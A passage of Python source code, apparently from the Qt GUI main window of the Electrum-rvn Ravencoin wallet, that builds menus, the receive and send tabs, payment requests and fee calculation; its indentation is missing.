history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&RVN Electrum Wiki"), lambda: webbrowser.open("https://raven.wiki/wiki/Electrum"))
help_menu.addAction(_("&Ravencoin.org"), lambda: webbrowser.open("https://Ravencoin.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('ravencoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-rvn",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/traysi/electrum-raven/issues\">https://github.com/traysi/electrum-raven/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.print_error("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if is_relevant:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if is_relevant:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-rvn", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-rvn", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected%s.png"%fork_str)
else:
icon = QIcon(":icons/status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.is_max = False
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.is_max:
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
